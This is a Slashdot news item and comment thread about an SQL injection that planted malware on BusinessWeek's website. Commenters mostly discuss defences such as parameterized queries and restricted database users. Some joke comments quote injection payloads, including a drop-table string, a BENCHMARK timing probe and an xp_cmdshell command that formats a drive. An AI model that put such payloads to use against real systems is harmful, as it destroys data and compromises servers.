Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Security

SQL Injection Turns BusinessWeek Into Viral Replicator 116

martins writes "The website of popular magazine BusinessWeek has been attacked via SQL injection in an attempt to infect its readership with malware. Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected."
This discussion has been archived. No new comments can be posted.

SQL Injection Turns BusinessWeek Into Viral Replicator

Comments Filter:
  • by Scutter ( 18425 ) on Monday September 15, 2008 @08:37AM (#25009071) Journal

    Sophos informed BusinessWeek of the infection last week, although at the time of writing the hackers' scripts are still present and active on their site.

    It's bad enough to have an insecure site, but to ignore the break-in for a week or more is just unconscionable.

    • Re: (Score:3, Interesting)

      by JCSoRocks ( 1142053 )
      I never understood how SQL injection happened on major sites until it happened to someone I know. (wow that sounded like a bad plug for some unknown disease... anyway...) Initially he absolutely refused to believe that it was SQL injection because, "His application wasn't vulnerable to that!". Finally, in the face of overwhelming truth it dawned on him that it was... so what happened? Oh, the database got cleaned up from a back up... but no code was changed. Then they did it again a short while later and he
      • by Splab ( 574204 )

        Actually I've been wondering about these injection attacks, I use positional bindings, everything run from stored procedures and using dedicated users - not super users; so its pretty much impossible to inject anything harmful to my system via. SQL - however, that does not guarantee anything for the users.

        Are these attacks the old type with ;-- (escaping the query) or are they just code embedded through postings, i.g. forums/discussions from poorly escaped input / code injection through get requests?

        • by ednopantz ( 467288 ) on Monday September 15, 2008 @11:43AM (#25012253)

          They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.

          Her response: "Don't use Microsoft products."

          Swing and a miss!

          The candidate's sample code had a big 'ol SQL injection vulnerability. Yet the instructor raved over his project.

          • Teaching security is hard. In a more ideal world, your students adore math and critical thinking, and would love to sign up for a course on cryptography and computer security with all those pre-requisites. And TAs would grade programs with an eye to all forms of flaws, be it database normalization, documentation or injection.

            The depressing reality is that students don't have any passion if it isn't related to video games, and teaching "intro to databases" is about the least impressive role I know of in CS,

          • by galego ( 110613 )
            Instructors live in ivory towers ... sql injections can't climb up ivory yet, no? :p
          • Re: (Score:3, Informative)

            by El_Oscuro ( 1022477 )

            In one important way, she is right:

            SQL Server allows multiple commands to be parsed and executed on a single call, separated by a semicolon. Thus something like Robert''; drop table students; -- works

            Oracle (while it has plenty of security vulnerabilities of its own), only allows one command to be executed. So if it is a query, a query is all you can do. True, if the developer is really stupid, you can do things like query DBA_USERS, but you are not going to be able to insert virus code or drop tables.

            If

          • by Mike89 ( 1006497 )

            They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.

            This. I'm doing a Computer Science degree in Australia and we're learning how to check user input... via JavaScript. No mention of validation on the server-side. No SQL injection prevention. It's a joke.

            • This. I'm doing a Computer Science degree in Australia and we're learning how to check user input... via JavaScript. No mention of validation on the server-side. No SQL injection prevention. It's a joke.

              If you attend the University of New South Wales, enroll in "Cryptography and Security" with Richard Buckland, if you do not attend the University of New South Wales, enroll there and see point one. This class teaches you systematic thinking about security vulnerabilities, going beyond secure software. It tea

              • by Mike89 ( 1006497 )
                I believe you ;). I have a job interview coming up for a good traineeship, so hopefully I get that and I can defer. Thanks for the tip though :)
    • Re: (Score:3, Funny)

      by b4dc0d3r ( 1268512 )

      It's a site for MBAs - they were waiting for the "technical guys" to fix it. First techie to raise the issue gets fired as a scapegoat, second one has to fix it.

  • Hmm (Score:5, Funny)

    by LizardKing ( 5245 ) on Monday September 15, 2008 @08:37AM (#25009073)
    It really is fscked. Every job advert is for Lehmans.
  • by rainer_d ( 115765 ) on Monday September 15, 2008 @08:39AM (#25009099) Homepage

    Ah-well, only kidding ;)

  • by Centurix ( 249778 ) <centurix@gmYEATSail.com minus poet> on Monday September 15, 2008 @08:39AM (#25009111) Homepage

    A replicant virus. Is it a virus or a replicant? Will it need retiring? If the website hosted a picture of a turtle on its back, will it rotate the picture 180 degrees? Will we know if it's a replicant virus or a real virus by the end of the article?

  • by Anonymous Coward on Monday September 15, 2008 @08:40AM (#25009117)

    HAI!

    Just a friendly reminder - your Database Admin will be more than happy to set up multiple users for you with different permissions. For instance, a user with "write" privileges that can be used by the website backend page that the editors use, and a user with "read only" permissions that the public facing web server(s) will use when presenting the page to the public.

    That is all.

    • by apathy maybe ( 922212 ) on Monday September 15, 2008 @09:05AM (#25009495) Homepage Journal

      This is a very good point. Except that phpMyAdmin makes it really easy to set up a new database with a single user who has all rights, and the same name as the DB.

      So what I tend to do (and I do admit that I am a lazy SOB), is just create a new DB and user for every app.

      However, your idea is much better, and it would be nice if phpMyAdmin had such a feature... (Not that I'm about to code it in, on account of my being busy with other things, and never having even looked at the phpMyAdmin code beyond what is needed to install it.)

      However, an even better thing to do (then just create a read-only user), is to escape shit before you query the DB... PHP and MySQL have this nifty function mysql_real_escape_string [php.net] which will do that for you. It is better then using the general escape functions in PHP, for reasons that I read just recently. Basically, it takes into account the character encoding for the DB... http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string [shiflett.org]

      • Re: (Score:3, Insightful)

        by Anonymous Coward

        Multiple DB users, proper escaping, you know it's not actually an either-or situation. If the only way you know to set up a database is through phpMyAdmin, then you need help reading the manual.

      • Re: (Score:2, Informative)

        However, your idea is much better, and it would be nice if phpMyAdmin had such a feature

        Um, it does. Click on 'Privileges' and then 'Add a new user'. You're looking for 'database-specific priveleges.'

        • I know that ;). I was looking for an easy "one click" create two users for one DB, in the same way that you can currently create a user and a DB at one time.

          • I know that ;). I was looking for an easy "one click" create two users for one DB, in the same way that you can currently create a user and a DB at one time.

            Well, it's not like it's that hard. Honestly, this really sounds like you're just being lazy. ;)

      • by moreati ( 119629 )

        However, an even better thing to do (then just create a read-only user), is to escape shit before you query the DB... PHP and MySQL have this nifty function mysql_real_escape_string [php.net] which will do that for you. It is better then using the general escape functions in PHP, for reasons that I read just recently. Basically, it takes into account the character encoding for the DB... http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string [shiflett.org]

        Please repeat after me: String escaping is th

        • by Shados ( 741919 )

          The string escaping culture is really sticky, too. Its almost like hungarian notation, but worse. People tend to get insulted if you mention that you need to use prepared statements. Then when you explain it, they tend to insist that nothing can get through string escaping, that its perfectly fine, and sometimes they make excuses for it being better.

          Then the only way to convince some people is to point out the performance issues (prepared statements result in cached query plans in many RDBMS, giving perform

        • I'm curious, why is string escaping depreciated? The Wikipedia article doesn't make it clear.

          • by mortonda ( 5175 )

            I'm curious, why is string escaping depreciated? The Wikipedia article doesn't make it clear.

            My thought is that using string escaping makes it easy to forget to escape something. Using prepared statements is such a different method, it's easier to do it right.

            After cutting my teeth on perl's DBI and prepared statements, it just kills me when I have to do a VBA app... no placeholders at all.

            • Re: (Score:3, Informative)

              by Shados ( 741919 )

              VBA can have paramterized query. The old ADO supports them just fine...

              • by mortonda ( 5175 )

                I guess I did run into that recently, but didn't quite put it together... I was looking for "?" as a place holder.

                Is it actually usefull for preventing sql injection by escaping the contents of the parameter?

          • Re: (Score:3, Interesting)

            by Shados ( 741919 )

            The fact that "mysql_real_escape_string" or whatever exists is an example of that: String escaping relies on string manipulation tricks to make things "secure". On top of being potentially vulnerable to any problem in the server (which obviously cannot be gotten around of), it is also vulnerable to anything on the language side: for example, a string vulnerability would also make your queries vulnerable. Two attack vectors.

            Its a workaround, a cheat, a hack. A prepared statement is handled by the driver and/

          • Using escaping to protect your queries is like doing strings by manually allocating blocks of memory and then storing a sequence of characters in them followed by a null terminator (either directly or through a series of helper functions).

            Both can sometimes be forced on you by the environment you are working in. Both require an extreme level of attention to detail by both the initial programmer and later programmers who work on the code. Both can easilly lead to security holes if the programmer makes a simp

        • I agree, but just to nitpick:
          Prepared statements are a subset of parameterized queries. A prepared statement is a parameterized query with a flag indicating that the query should be "prepared" for reuse (possibly with different values for the parameters), so that the cost of analyzing the query and developing an execution plan is limited to the first execution. There can be a bit of extra overhead, typically in the creation of a temporary stored procedure, so a query that is only to be executed once shoul

          • by Shados ( 741919 )

            The last bit is incorrect. In most modern RDBMS, the query analysis is done at the same time for both stored procedure and parameterized queries, and then, in both cases, is cached, for whatever amount of time the RDBMS (or DBA configuration) tells it to, and reused for that period of time.

            Compile time query analysis and query plan caching is actually an old way of handling it (some less powerful rdbms still do it that way, but the good ones don't): it has to be, as the query analysis will vary GREATLY depe

      • However, an even better thing to do (then just create a read-only user), is to escape shit before you query

        Or use a parameterized query like select * from users where username = @username INSTEAD OF "select * from users where " + unfiltered_string where the the unfiltered string is taken straight from an input on the public website, spliced into a string literal query, and then passed on to the database. Of course, filtering is still advisable too in any case but really, there is no better way to announce to the world that an operation is amateur night (i.e. we just read "Teach Yourself PHP in 10 Minutes" before

      • by smoker2 ( 750216 )
        phpMyAdmin already has this feature. Except in shared hosting environments, where each sites admin has permissions to read/write but not create.
        If they are in that situation, they can still ask their host to add another user to their dbase with the required permissions.
      • by mortonda ( 5175 )

        This is a very good point. Except that phpMyAdmin makes it really easy to set up a new database with a single user who has all rights, and the same name as the DB.

        So what I tend to do (and I do admit that I am a lazy SOB), is just create a new DB and user for every app.

        However, your idea is much better, and it would be nice if phpMyAdmin had such a feature...

        It does! I create the database, then a user(s) with no permissions. Each user can be set down to the dtabase or table level, with different permissions.

        However, it is also good practice of course, to use placeholders to properly escape data to the database.

      • by orkysoft ( 93727 )

        Try a prepare statement sometime. How many escaping functions does PHP have these days?

    • And in case you want to implement least privilege in your PHP application but still provide access to high level database users...

      phpgirder [sourceforge.net]

      A shameless plug ;)
  • by Anonymous Coward on Monday September 15, 2008 @08:41AM (#25009149)

    Bobby Tables is at it again...

  • by nathan.fulton ( 1160807 ) on Monday September 15, 2008 @08:52AM (#25009307) Journal
    TFA: "the code injected into BusinessWeek's website points to a Russian website that is currently down and not delivering further malicious code."

    Seriously? Why is it that these people always point to their site? wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?

    Also, they always waste these opportunities to give replace real headlines with those from the Onion... if they're going to do something malicious, they should at least do it with style...
    • Re: (Score:2, Insightful)

      If you're going to do something malicious for profit you should make it look like nothing ever happened. While swapping the headlines would be funny it would definitely lessen the amount of time the flaw went unnoticed.
    • Re: (Score:2, Insightful)

      Seriously? Why is it that these people always point to their site? wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?

      1. Inject a database to gain access
      2. Insert barebones code to bootstrap from an updateable external source
      3. Patch the database so no one else can remotely take over your newly pwned database

      In short, it's because the people who do this want to make money and insure that they can update the mali

    • The reason they don't, is because they cannot. SQL injection lets you put stuff into database tables. It doesn't let you put stuff into their filesystem. You can add a javascript to their page, but I don't think there are any javascript viruses still running rampant. Barring that, you need a Flash file, or some other buggy and horrific file that you can embed. And that has to be hosted by you, since you can add a frame linking to it easily, but you cannot just upload it to their server. The only excep
  • by prgrmr ( 568806 ) on Monday September 15, 2008 @08:55AM (#25009349) Journal
    Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected

    I suppose McDonald's is going to have to rely on employing just the liberal arts majors for now.
    • Re: (Score:3, Insightful)

      by flyingfsck ( 986395 )
      You made me snort my coffee... but it is so true. The other problem is that MBAs are very unlikely to know how to fix their machines once they are fscked up. In every place I worked, most viruses were spread by the top brass.
  • The original source of this story is security firm Sophos, who have posted a video [sophos.com] about the BusinessWeek SQL injection attack. Their advisory [sophos.com] makes the point that the victims of this particular attack would be MBA students, likely to earn a small fortune in their future careers. The video was made on an Apple Mac - kinda funny as chances are that the resulting malware wouldn't actually be targeting that platform.
  • Sigh...And all the developers had to do was use binds, which actually make programming easier, too. I wonder if they wrote code to handle the dreaded apostrophe.
  • One of the pages that reads from the owned DB: hxxp://bwnt.businessweek.com/recruiting/index.asp?f=M

    RBN > BusinessWeek?

    Also, did anyone notice how close the subdomain is to 'pwnt'?
  • I can't believe in this day and age something as lame as sql injection is still happening, especially to large company websites. Anyone using inline SQL should be taken out back and ridiculed until they cry. If your developers are mindless enough not to validiate user input then at least use stored procedures.
    • by Shados ( 741919 )

      Don't even need stored procedures... prepared statements are more than enough... But seems like even this is asking too much. I'll never understand... having to think about all the concatenating and quote escaping and conversion of datatypes to string and all that garbage is so confusing... Even if it wasn't for security, prepared statements are so much better (when not using an ORM anyway)

    • If your developers are mindless enough not to validiate user input then at least use stored procedures.

      ... and, don't forget the most important: forbid the end users to employ dangerous words [sactocu.org] in their "security question" answers. Hey, how cool is that?

      (You can find this and other amusing samples of anti sql-injection techniques by dumb developers at WTF [thedailywtf.com])

      • But what if my mother's maiden name is BENCHMARK(1000000000,MD5(CHAR(116)))? We're Irish, after all!

        and yes, my childhood pet WAS called "'; xp_cmdshell 'format c: /q /yes '--" and I loved him.

No spitting on the Bus! Thank you, The Mgt.

Working...